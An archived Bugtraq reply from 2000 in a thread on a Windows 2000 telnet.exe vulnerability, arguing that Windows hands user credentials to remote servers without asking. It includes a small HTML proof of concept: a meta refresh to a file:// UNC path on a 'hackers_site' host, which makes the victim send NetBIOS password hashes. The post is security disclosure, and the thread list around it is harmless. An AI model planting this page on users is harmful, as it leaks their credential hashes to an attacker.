Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Рягин Михаил Юрьевич <ryagin () EXTRIM RU>
Date: Fri, 15 Sep 2000 10:59:26 +0600
The problem is far more general then within single poor configuration defaults in telnet.exe. The main problem is that Windows automatically supply user credentials in many situations without ever asking for his opinion. For example, the following html file: <html><head> <meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt"> </head> <body> You will be hacked within 5 seconds... </body> </html> will automatically connect to evil site thru netbios and supply user password hashes. Putting malicious site into 'Restricted Zone' doesn't helps.
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)